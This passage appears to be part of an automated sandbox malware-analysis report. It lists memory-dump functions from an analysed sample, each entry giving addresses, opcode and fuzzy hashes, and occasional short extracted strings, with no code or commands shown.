              • Snapshot File: hcaresult_33_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 13e8e2e29fc3f14f671cfe17b4eb7eeb193920cf7b94a0dcf4250de5078f439b
              • Instruction ID: c9ce25a61075421cc5824392285b48c3cec260e0ecba4b8def61ece9d58f82fa
              • Opcode Fuzzy Hash: 13e8e2e29fc3f14f671cfe17b4eb7eeb193920cf7b94a0dcf4250de5078f439b
              • Instruction Fuzzy Hash: 31118E71A1C68D8FDB94EF6488A92BD7BE0FF1A300F4144BAD50AD2192EA79A550CB40
              Function 00007FFD347705D8 Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000021.00000002.2234611378.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fa2db4b292de50bc6a1818d443f0795d1d3b1658e0be3d3cfe60321c839d0f48
              • Instruction ID: 38a48a11af9bc4e842622009b0c376f847d6989a6755cdaaa390974ed0349326
              • Opcode Fuzzy Hash: fa2db4b292de50bc6a1818d443f0795d1d3b1658e0be3d3cfe60321c839d0f48
              • Instruction Fuzzy Hash: 3C019270A0450DCFEB98EF64C4A56B97BA1FF5A304F50807ED40ED2291CE75B554C780
              Function 00007FFD34772E71 Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000021.00000002.2234611378.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6da6e8819993b392ea368682eed56890fbda78679ff7b400e4e592b9325dcf2a
              • Instruction ID: 5408e168427a44d7209366923171d105fd6576c9255f936f08021950bd0146a3
              • Opcode Fuzzy Hash: 6da6e8819993b392ea368682eed56890fbda78679ff7b400e4e592b9325dcf2a
              • Instruction Fuzzy Hash: FB018470A1864A8FE751EB74889C6B97BE0EF1B300F4195B6D518C61A2EB78F594C740
              Function 00007FFD34788251 Relevance: .0, Instructions: 48COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000021.00000002.2234611378.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_7ffd34784000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b39a8305ece6ee020013fdc7abe69304a2eaa825554dbd4cadd18d2a71784adf
              • Instruction ID: 201f922c6818fc7ec0ce73c952ae19ccdca344f9ab58944ce47a68b4e2978d5b
              • Opcode Fuzzy Hash: b39a8305ece6ee020013fdc7abe69304a2eaa825554dbd4cadd18d2a71784adf
              • Instruction Fuzzy Hash: B701D470A58609CFDB99EF64C8A96BE37A0FF1A301F5204BEC00AC6192EE38A510C740
              Function 00007FFD3477284D Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000021.00000002.2234611378.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8da772eca910777b4a14c87c8b33ac73c17700bd376e4fac788cb31576587a38
              • Instruction ID: dc100b0305b7332155b078638551cdd6f1fead166712c30a3376eca17f108f7b
              • Opcode Fuzzy Hash: 8da772eca910777b4a14c87c8b33ac73c17700bd376e4fac788cb31576587a38
              • Instruction Fuzzy Hash: C401D470A1858ECFE791AB2888981B97FE0EF1A310F8586B6D518C6092EE7DF040C780
              Function 00007FFD34772EE9 Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000021.00000002.2234611378.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 71fbb8650b93e613d4e3c84820e28125d2f66534e560c719886c6492aaff660b
              • Instruction ID: d73c0e40b1004aef2445b721c7b3aeaa313618399d79b22225e54bda99c8a42f
              • Opcode Fuzzy Hash: 71fbb8650b93e613d4e3c84820e28125d2f66534e560c719886c6492aaff660b
              • Instruction Fuzzy Hash: 84018F70A1D6498FE742EB7488A96B97BE0EF0B300F4689F2D418CB0A3DA7CB444C751
              Function 00007FFD34787B19 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000021.00000002.2234611378.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_7ffd34784000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1a157dd574ff7b056665c78eef1c84160ccb46ed0c8a88132221aeb86ff3d793
              • Instruction ID: 03b1d2817de2c323d148cbf2f37691673da12ce1345a9fad71c5781e27f09d50
              • Opcode Fuzzy Hash: 1a157dd574ff7b056665c78eef1c84160ccb46ed0c8a88132221aeb86ff3d793
              • Instruction Fuzzy Hash: ED01B171A1D6898FE792AB7488AA1E97FF1EF56301F0544F6C109CB0A2EE38A444C341
              Function 00007FFD347882CD Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000021.00000002.2234611378.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_7ffd34784000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 510ad2e13099be6484119ef51b342a86803a415798627bbfffe248cc848083d1
              • Instruction ID: e98e0202136e47c49ab518793128c309322cb8fb906194fb986930caed4e81f8
              • Opcode Fuzzy Hash: 510ad2e13099be6484119ef51b342a86803a415798627bbfffe248cc848083d1
              • Instruction Fuzzy Hash: 4501F230A49249CFDB99EF64C4E92FE3BA0FF0A301F0114BED41AC6592DE39A554C780
              Function 00007FFD34770608 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000021.00000002.2234611378.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 800562229cec6145f29fc67a960c64d029addfea568d6f5329a9a4caced4e3a7
              • Instruction ID: 4cef8e030627cccb8470396301aa5c2de9c78b2c9b52258fb404a5ac2b111e43
              • Opcode Fuzzy Hash: 800562229cec6145f29fc67a960c64d029addfea568d6f5329a9a4caced4e3a7
              • Instruction Fuzzy Hash: 9201D170A1450ECFEB98EB64C8A82BA37A4FF1A305F90887ED51ED21D1DE79B050C680
              Function 00007FFD34770610 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000021.00000002.2234611378.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1d088e264ba1794d49b050e02f8721f592c4eaea999c8a6cbcfa9b904b57b93f
              • Instruction ID: 80d6c74dad3dd560155680c260b8c78db1903b5c5d4c3e089def3d8e5425b8a1
              • Opcode Fuzzy Hash: 1d088e264ba1794d49b050e02f8721f592c4eaea999c8a6cbcfa9b904b57b93f
              • Instruction Fuzzy Hash: 11016D70A1890ECAEB58EB6488A82B977A0FF1A305F50887ED41ED21D1DF7AB550D680
              Function 00007FFD34771C7D Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000021.00000002.2234611378.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0ce9094660160381398108b5974882b9d2cdb000207b25fac72911173860b5b2
              • Instruction ID: 0ef52f64f8eadecb1c6e1c121e74b62e04a81927c5a27138b94ad327b79dd881
              • Opcode Fuzzy Hash: 0ce9094660160381398108b5974882b9d2cdb000207b25fac72911173860b5b2
              • Instruction Fuzzy Hash: CAF0A470A0964E8FEB94DF24C8A52BA3BA0FF56304F80417AD80CC2292DB79E554D780
              Function 00007FFD3477CCD8 Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000021.00000002.2234611378.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f4e8219e755bb39a31750abc2188971ff5d035e2e082b1a62d71f4e74bd2e3fe
              • Instruction ID: ac0f5b8789d472bb0678553e31bff10e5ff637a0f7bef76d5edeb519005ba578
              • Opcode Fuzzy Hash: f4e8219e755bb39a31750abc2188971ff5d035e2e082b1a62d71f4e74bd2e3fe
              • Instruction Fuzzy Hash: 6CF0867090964ACFEB549F64C8A91F93FE0FF0A314F40497AE918C2051DBB85561D780
              Function 00007FFD3477AE7B Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000021.00000002.2234611378.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b71115db42333e392c4b70cde8afef85502c80ffb39c8e0b6796ebfbeacb94bc
              • Instruction ID: ac1bc90c97dd83f338b37dc495fbaf86ef317c4adec960a3489529a61ba5e7c4
              • Opcode Fuzzy Hash: b71115db42333e392c4b70cde8afef85502c80ffb39c8e0b6796ebfbeacb94bc
              • Instruction Fuzzy Hash: B5F0A471A1C60DDEFB51EB3488DA5FD7BD0EF1A300F408871D508C2052EEB8B0549681
              Function 00007FFD34772769 Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000021.00000002.2234611378.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 37d27e8b891576319aa9c7ecb3e9c7d4036a106a446e683a6ee49fd95ed3c01e
              • Instruction ID: 5b803ac11d9aabc30c27f4d8622695e83e30d09d994a7db27dc7c0deae7cc883
              • Opcode Fuzzy Hash: 37d27e8b891576319aa9c7ecb3e9c7d4036a106a446e683a6ee49fd95ed3c01e
              • Instruction Fuzzy Hash: BAF0CD3090D3898FEB599F2488A92B93FB4BF06200F8548FAD619C61D2DA7CA454C791
              Function 00007FFD34781240 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000021.00000002.2234611378.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 090becbc354f6bda4ee585630bc678dcb9c6830eb80a897873b329ecabe5ef07
              • Instruction ID: d0b3e812ab31591adb28e47968f3d050ea198338d031c78dcde1fff9319a5b41
              • Opcode Fuzzy Hash: 090becbc354f6bda4ee585630bc678dcb9c6830eb80a897873b329ecabe5ef07
              • Instruction Fuzzy Hash: D2F05E70A1860E8EEBC4EF6898592FE76A0FF15301F40053AE81DC2190DF346550C780
              Function 00007FFD347727DD Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000021.00000002.2234611378.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 14de5a92620b7cb4f377e759717f76c343de72c2cc0a6a0921cf74ea6a6ffdd2
              • Instruction ID: 4af1c28f7f7542c0405f741d92d97629db8ba6b3375ebde65c0246d98ef41fe4
              • Opcode Fuzzy Hash: 14de5a92620b7cb4f377e759717f76c343de72c2cc0a6a0921cf74ea6a6ffdd2
              • Instruction Fuzzy Hash: ABF0F671A0D689CFEB599F248C652B93FA0FF46300F8144BED519C20D2DB7EA414C340
              Function 00007FFD34772377 Relevance: .0, Instructions: 24COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000021.00000002.2234611378.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fd4cc68147644ff0e5eb38d5a1cb17687d365162a51c6ce629e85ea5a38aeb38
              • Instruction ID: f2764ab75f4f0512e8f60d3aa0a898028617ebb41d37341ac34d8f4ca0d6ff7d
              • Opcode Fuzzy Hash: fd4cc68147644ff0e5eb38d5a1cb17687d365162a51c6ce629e85ea5a38aeb38
              • Instruction Fuzzy Hash: 9DF05E70A0865ACFDB10EB10CCA07A877A1FB51310F4042A9C14AD32D2DFB879859B41
              Function 00007FFD3477BCCA Relevance: .0, Instructions: 14COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000021.00000002.2234611378.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e4b780b03877db68a31fe5d6e72d2f5ff2c1e79403b71ece43b396150e32fb8d
              • Instruction ID: 125b28653c1e870cc639769c85b7230cb6eb49b3383d0f640ad982722c690d1b
              • Opcode Fuzzy Hash: e4b780b03877db68a31fe5d6e72d2f5ff2c1e79403b71ece43b396150e32fb8d
              • Instruction Fuzzy Hash: 48D01260A4C40BC9DB60D614C894EFC76649F15300F60D5B1811DD2082DD7879C46B80
              Function 00007FFD347858E4 Relevance: .0, Instructions: 12COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000021.00000002.2234611378.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_7ffd34784000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 94c050ce8753f5a36cf42dcb6b375d2b350f6cbf86076c5186f78ee6eabef547
              • Instruction ID: 63db1404af45819677dc6c58ba0a205a0e8b5aa234beab250121d8183c996946
              • Opcode Fuzzy Hash: 94c050ce8753f5a36cf42dcb6b375d2b350f6cbf86076c5186f78ee6eabef547
              • Instruction Fuzzy Hash: B6D0C9A6A2995E8FEB94DE1848951B97AA2E714284B115121D449D71A1EA2864029740

              Non-executed Functions

              Function 00007FFD3478050C Relevance: 5.0, Strings: 4, Instructions: 36COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000021.00000002.2234611378.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: H$K$L${
              • API String ID: 0-964284359
              • Opcode ID: d8ecf950a023fd19cefc18c5546fa02bdf1ed46dc339ae028b6d4c7a6fdc16c2
              • Instruction ID: 5bfeeb554f212ba7305527a54a0b5a1e917e3788b9ef13fec444f6b4fc7848a0
              • Opcode Fuzzy Hash: d8ecf950a023fd19cefc18c5546fa02bdf1ed46dc339ae028b6d4c7a6fdc16c2
              • Instruction Fuzzy Hash: B30100B4E0922ACADF688F10C9A43FD7671AF56300F4040B9C31DA6281CB7C6A81DF80

              Executed Functions

              Function 00007FFD3478CAA9 Relevance: .5, Instructions: 463COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9a0076f080f8539589a7c6e2d766ac3afd8f51f21c4de5fa4b9a85b239e2d063
              • Instruction ID: 666d2617f5c3858ae869a97ec5850bb40ae70d7702be2f225e12ba01f077d752
              • Opcode Fuzzy Hash: 9a0076f080f8539589a7c6e2d766ac3afd8f51f21c4de5fa4b9a85b239e2d063
              • Instruction Fuzzy Hash: B7D1D667B0DA968FE351777CA8B60F97FA0DF5323670801B7C288CA093D91D744A92E1
              Function 00007FFD34783565 Relevance: .3, Instructions: 303COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f05c5c404a617a18e6cea24166eacaaab0c253f6a576837211574c326912064c
              • Instruction ID: ec528442ca4bd8ef62e387668a0298cf7bd2ff731b9a428c1c652d48b12c88ce
              • Opcode Fuzzy Hash: f05c5c404a617a18e6cea24166eacaaab0c253f6a576837211574c326912064c
              • Instruction Fuzzy Hash: 65A17F71B1894E8FEB94DB6CC8657AD7BE1FF9A311F5002BAD00DD32D6CBA968018741
              Function 00007FFD3479050C Relevance: 8.9, Strings: 7, Instructions: 168COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: 1$?$H$K$L$k${
              • API String ID: 0-824296765
              • Opcode ID: ae7173a1de2d39bf6850deda14354f63153562177b4166b0d319cc88c2882e39
              • Instruction ID: fe110740a9d944792f7ec9ef9d608a9190c02c0982c106ac73a6e97643abf752
              • Opcode Fuzzy Hash: ae7173a1de2d39bf6850deda14354f63153562177b4166b0d319cc88c2882e39
              • Instruction Fuzzy Hash: 26610D70E19A69CFDBA8DB18C8957ADB3B1EB55301F1001FAD10DE2291DA396A819F41
              Function 00007FFD3478EB56 Relevance: 3.8, Strings: 3, Instructions: 53COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: P$j${
              • API String ID: 0-2719876955
              • Opcode ID: 3f48270cfd1ef36a25f363290a3f395418f645847a26f25c2193d4db8eafac2c
              • Instruction ID: cdc26e9098afc3bb298ff1e8ae41ff953adf33421ad606e36951b3252f06887a
              • Opcode Fuzzy Hash: 3f48270cfd1ef36a25f363290a3f395418f645847a26f25c2193d4db8eafac2c
              • Instruction Fuzzy Hash: B821FCB0919229CFEBA4DF10C8957E876F1AB19301F1001F9D20DE2281CB7C6A84DF85
              Function 00007FFD3478DD31 Relevance: 2.9, Strings: 2, Instructions: 427COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: Nf4$p\f4
              • API String ID: 0-128564398
              • Opcode ID: fa3d5c005a71bebadcfb55de15aa0c8f301f1990527c7a795c1de8732b624e6b
              • Instruction ID: 2baf840529ada28caa0a1ef1c1918ee3750f2d9fd0a800017fd5076c5e03b8b0
              • Opcode Fuzzy Hash: fa3d5c005a71bebadcfb55de15aa0c8f301f1990527c7a795c1de8732b624e6b
              • Instruction Fuzzy Hash: C0E12E71E18A59CFEBA8DF68C4A57B8B7A1FF59305F1441BED00DE3692CA386840DB41
              Function 00007FFD3478ED2A Relevance: 1.4, Strings: 1, Instructions: 118COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: 1
              • API String ID: 0-2212294583
              • Opcode ID: 6727624c1becadee660f1bec879f225a318ad0ce87cb6d8bad0fe0510250ffa5
              • Instruction ID: f75fb83aadde03cff5cdd27823f0d04e75e54cfb885f3d72572f52d22c9cf635
              • Opcode Fuzzy Hash: 6727624c1becadee660f1bec879f225a318ad0ce87cb6d8bad0fe0510250ffa5
              • Instruction Fuzzy Hash: 2641E871A19A598FDBA8DB18CC95BADB3B1FB54302F1002EAD44DE3291DE356AC18F41
              Function 00007FFD3478C562 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: R_H
              • API String ID: 0-1692749215
              • Opcode ID: c91075980c5cb25ee14198f4df5a55802585ce6a718508627591cf297bd94514
              • Instruction ID: 33820e95f55c3ff38fb0a17d3d1206e7b925f0b68aa440bd83a20ecbad3ca25f
              • Opcode Fuzzy Hash: c91075980c5cb25ee14198f4df5a55802585ce6a718508627591cf297bd94514
              • Instruction Fuzzy Hash: 6D31BCB5E1891D8FEBD4EB58D8A66ACB7F1FF99301F501139D10DE7242DE2868419B40
              Function 00007FFD347915B2 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: /
              • API String ID: 0-2043925204
              • Opcode ID: dff4e5fa524ebc2e69a3e5aff9913d2a1fed3cb1b10a43fae799789eae0c3b5e
              • Instruction ID: 0124f89fd6464dcaa9f0e103d8fa221baebc3f2375f07ffee4863633da58c4ba
              • Opcode Fuzzy Hash: dff4e5fa524ebc2e69a3e5aff9913d2a1fed3cb1b10a43fae799789eae0c3b5e
              • Instruction Fuzzy Hash: 7531F775E08629CEEBA4DF54D8A47E9B7B1FB59311F1002AAD40DE3291CF386994DF80
              Function 00007FFD34780A01 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: 8vg4
              • API String ID: 0-1336873573
              • Opcode ID: 7ad7bcc957fb2f3a03e875e2f74427be95721ec5739755bff0cc8f2b85818593
              • Instruction ID: 00cac17123d6f23830e7ae42c5df2101ff137e20dd07759cd46283b9ce1d92d7
              • Opcode Fuzzy Hash: 7ad7bcc957fb2f3a03e875e2f74427be95721ec5739755bff0cc8f2b85818593
              • Instruction Fuzzy Hash: 49119171A1864E8FE790EF68C49A2BE77E1FF5A301F424576C519D21A2EF38B5409780
              Function 00007FFD3478124D Relevance: 1.3, Strings: 1, Instructions: 56COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: pyg4
              • API String ID: 0-441656714
              • Opcode ID: c614ee201d2c1202ba46ad534652c999fbdae5e0e95521f8f04559cbeec4cdff
              • Instruction ID: 0be1f31a75449bf23e66437157611bd84d25b78d86e98762fd8ded43c908c56c
              • Opcode Fuzzy Hash: c614ee201d2c1202ba46ad534652c999fbdae5e0e95521f8f04559cbeec4cdff
              • Instruction Fuzzy Hash: 0411C170B0964A8FEB98DB64C5AA2BA7BE0FF5A302F00007EC00AD60D2DF38B540D740
              Function 00007FFD34781260 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: pyg4
              • API String ID: 0-441656714
              • Opcode ID: 3767dd80904621dc5787fe2b340d02a78abb514c9dea6b4b4ea1ec24f16c2198
              • Instruction ID: b8953f911a240d6018c5030de5584e874471caaefced58fe0967c7367f9c6856
              • Opcode Fuzzy Hash: 3767dd80904621dc5787fe2b340d02a78abb514c9dea6b4b4ea1ec24f16c2198
              • Instruction Fuzzy Hash: C3F0A4B1F0964E8AEBD49BA885A92FA77E4FF56316F04043AD51ED10C2DE287504D680
              Function 00007FFD3478EA48 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: (
              • API String ID: 0-3887548279
              • Opcode ID: 99999f1f4d19813d4cb095180f98d77ae26a2869b1177e9f3b6ec8244f11ddee
              • Instruction ID: 4288b2b3370d666942ec031517f8f2f45567fd0ab87e5dad657e61ee0d2a7e64
              • Opcode Fuzzy Hash: 99999f1f4d19813d4cb095180f98d77ae26a2869b1177e9f3b6ec8244f11ddee
              • Instruction Fuzzy Hash: DCF01C70A09619CFDBA4EF04C8A5BA873F1EB58311F1001AAD209D3291CB386AC0DF85
              Function 00007FFD347816C8 Relevance: .3, Instructions: 284COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3ad37552f396f3499e27ce5a661fbff4d664184614c9820efb6a988b8da5ca14
              • Instruction ID: d7c07f83fe389ff0e1ad8e47b1a15dc036b6bc9715ef8d6be720164a052bbe26
              • Opcode Fuzzy Hash: 3ad37552f396f3499e27ce5a661fbff4d664184614c9820efb6a988b8da5ca14
              • Instruction Fuzzy Hash: 6991B371B0CA498FDB99DE1C88A66B977E2FF99315B14057AE54DD3282CE34BC028781
              Function 00007FFD34780CF8 Relevance: .3, Instructions: 262COMMON
              Download Yara Rule
              Memory Dump Source
